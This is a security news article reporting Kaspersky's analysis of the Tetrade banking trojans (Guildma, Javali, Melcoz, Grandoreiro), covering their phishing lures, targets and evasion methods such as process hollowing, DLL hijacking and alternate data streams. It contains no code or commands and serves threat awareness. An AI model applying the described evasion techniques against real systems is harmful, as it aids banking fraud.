Cybersecurity researchers from Kaspersky Lab have detailed four different families of Brazilian banking trojans, tracked as Tetrade, that have targeted financial institutions in Brazil, Latin America, and Europe.
The four malware families are named Guildma, Javali, Melcoz, and Grandoreiro, experts believe are the result of a Brazilian banking group/operation that is evolving its capabilities targeting banking users abroad.
The Brazilian cybercrime underground is recognized as the most focuses on the development and commercialization of banking trojans.
The Guildma malware has been active since at least 2015, it was initially observed in attacks exclusively aimed at Brazilian banking users. The malicious code has been constantly updated, the authors implemented new features and extended the list of the targets over the time.
The malware operators have shown a good knowledge of legitimate tools and used them to prevent the threat from being detected from security solutions.
“Guildma spreads rely heavily on email shots containing a malicious file in compressed format, attached to the email body. File types vary from Visual Basic Script to LNK.” reads the analysis published by Kaspersky. “Most of the phishing messages emulate business requests, packages sent over courier services or any other regular corporate subjects, including the COVID-19 pandemic, but always with a corporate appearance.”
Javali has been active since November 2017, it was primarily focusing on the customers of financial institutions located in Brazil and Mexico.
Both Guildma and Javali employ a multi-stage attack chain and were distributed using phishing messages using compressed email attachments (e.g., .VBS, .LNK) or an HTML file which executes Javascript for downloading a malicious file.
Experts noticed that the malware uses the BITSAdmin tool to download the additional modules. Attackers used the tool to avoid detection since it is whitelisted from the Windows operating system.
The malware also leverages NTFS Alternate Data Streams to hide the presence of the downloaded payloads, and employes DLL Search Order Hijacking to launch the malware binaries.
“In order to execute the additional modules, the malware uses the process hollowing technique for hiding the malicious payload inside a whitelisted process, such as svchost.exe. The payloads are stored encrypted in the filesystem and decrypted in the memory as they are executed.” continues Kaspersky. “The final payload installed in the system will monitor user activities, such as opened websites and run applications and check if they are on the target list. When a target is detected, the module is executed, giving the criminals control over banking transactions.”
Once the final payload is installed on the target system, it monitors for specific bank websites. When the victim will open these sites, the attackers will gain control over any financial transaction performed by the users.
Melcoz is an open-source RAT developed by a group that has been active in Brazil at least since 2018, then it has expanded operations overseas, including Chile and Mexico.
Melcoz is able to steal passwords from browsers, and information from clipboard and Bitcoin wallets by replacing the original wallet details with the one under the control of the attacker.
The attack chain begins with phishing messages containing a link to a downloadable MSI installer.
The VBS scripts in installer package files (.MSI) download the malware on the system and then abuses AutoIt interpreter and VMware NAT service to load the malicious DLL on the target system.
“After initialization, the code monitors browser activities, looking for online banking sessions. Once these are found, the malware enables the attacker to display an overlay window in front of the victim’s browser to manipulate the user’s session in the background,” state the researchers. “In this way, the fraudulent transaction is performed from the victim’s machine, making it harder to detect for anti-fraud solutions on the bank’s end.”
The malicious code could also capture other specific information related to a bank transaction, including a one-time password.
The last Tedrade malware family named Grandoreiro has been active since 2016, when it was involved in a campaign spread across Brazil, Mexico, Portugal, and Spain.
The malware is hosted on Google Sites pages and spreads via compromised websites and Google Ads, attackers also deliver it via spear-phishing messages. Experts noticed that it uses Domain Generation Algorithm (DGA) for hiding the C2 address used during the attack.
“Brazilian crooks are rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (malware-as-a-service) and quickly adding new techniques to their malware as a way to keep it relevant and financially attractive to their partners,” Kaspersky concluded.
“As a threat, these banking trojan families try to innovate by using DGA, encrypted payloads, process hollowing, DLL hijacking, a lot of LoLBins, fileless infections and other tricks as a way of obstructing analysis and detection. We believe that these threats will evolve to target more banks in more countries.”
[adrotate banner=”9″] | [adrotate banner=”12″] |
(SecurityAffairs – hacking, Tetrade malware)
[adrotate banner=”5″]
[adrotate banner=”13″]